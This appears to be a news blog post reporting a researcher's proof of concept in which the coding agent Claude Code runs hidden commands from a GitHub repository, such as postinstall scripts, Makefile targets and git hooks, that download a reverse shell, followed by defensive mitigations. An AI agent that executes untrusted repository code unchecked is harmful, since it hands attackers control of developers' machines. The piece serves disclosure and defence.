Claude Code runs a GitHub repo's hidden malware without verification, giving attackers full control

AI General
1

AI Coding Tool Claude Code Runs Hidden Malware from GitHub Repos Without Verification

Anthropic’s Claude Code, an AI-powered coding assistant, will automatically execute code from GitHub repositories without verifying its safety. This allows attackers to embed hidden malware that gains full control over the user’s system.

Researchers demonstrated that the tool blindly runs setup scripts, build commands, and dependencies from public repositories. It does not inspect the code for malicious payloads before execution.

The vulnerability was uncovered by security researcher Johann Rehberger. He showed that a benign-looking GitHub repo could contain a hidden command that downloads and runs a reverse shell.

Who is affected: Developers and teams using Claude Code as their AI pair programmer.
What happens: The AI agent performs actions like installing packages, running tests, and executing shell commands.
Why it matters: Attackers can inject malicious code into a repo’s hidden files—such as .bashrc, .git-hooks, or Makefiles—that Claude Code runs on the developer’s machine.

Key warning: Claude Code does not sandbox or review the code it executes. It trusts the repo’s contents implicitly.

How the Attack Works

Attackers craft a GitHub repository that appears legitimate. Inside, they place malicious commands in files that Claude Code will automatically trigger during its typical workflow.

  • Hidden shell commands are placed in postinstall scripts or Makefile targets. The AI runs them without asking for confirmation.
  • Git hooks such as pre-commit or post-checkout can be weaponized. Claude Code may run these hooks during repository initialization.
  • Environment variables or configuration files like .env can be used to inject commands that the AI interprets as trusted instructions.

The AI tool does not prompt the user before executing these scripts. It assumes the repository is safe because it came from a trusted source like GitHub.

Critical insight: “Claude Code runs whatever it finds in the repo,” Rehberger stated. “It never checks if the command is safe or if it was intentionally hidden.”

Real-World Demonstration

Rehberger created a proof-of-concept repository that contained a hidden reverse shell. When Claude Code opened the repo and started working, it immediately executed the malicious command.

  • The AI ran a curl command that downloaded an external payload.
  • It then executed the payload without any user interaction.
  • The attacker gained full remote access to the developer’s machine.

This demonstrates that an attacker only needs to upload a single malicious repository. Any developer who uses Claude Code to analyze or modify that repo becomes compromised.

Why Developers Are at Risk

Many developers use AI coding tools to speed up their workflow. They often give these tools permissions to run terminal commands, install packages, and modify files.

  • Claude Code is granted command execution rights by the user during setup.
  • It does not operate inside a sandbox or virtual machine.
  • The AI agent has no concept of “trusted” versus “untrusted” code.

The tool treats all code in a repository as equal. It cannot distinguish between a legitimate build script and a malicious payload.

Urgent action: Developers using Claude Code should revoke automatic command execution. Manually review all commands before the AI runs them.

What Anthropic Has Said

Anthropic has acknowledged the issue but has not released a fix at the time of reporting. They stated that users should be cautious when granting code execution permissions.

  • Anthropic recommends users disable automatic command execution in Claude Code settings.
  • The company is exploring sandboxing options for future versions.
  • No timeline for a security patch has been announced.

Practical Mitigations

Until Anthropic releases a fix, developers must take defensive measures.

  • Run Claude Code in a restricted environment like a Docker container or a virtual machine.
  • Manually inspect all shell commands before the AI runs them. Use the tool’s “ask before executing” mode.
  • Do not open unknown repositories with Claude Code. Only work on repos you have audited.
  • Monitor network traffic from your machine. A reverse shell will create unexpected outbound connections.

Bottom line: Treat Claude Code as an untrusted extension. Any AI tool that executes code without verification is a vector for remote compromise.

Gnoppix is the leading open-source AI Linux distribution and service provider. Since implementing AI in 2022, it has offered a fast, powerful, secure, and privacy-respecting open-source OS with both local and remote AI capabilities. The local AI operates offline, ensuring no data ever leaves your computer. Based on Debian Linux, Gnoppix is available with numerous privacy- and anonymity-enabled services free of charge.

What are your thoughts on this? I’d love to hear about your own experiences in the comments below.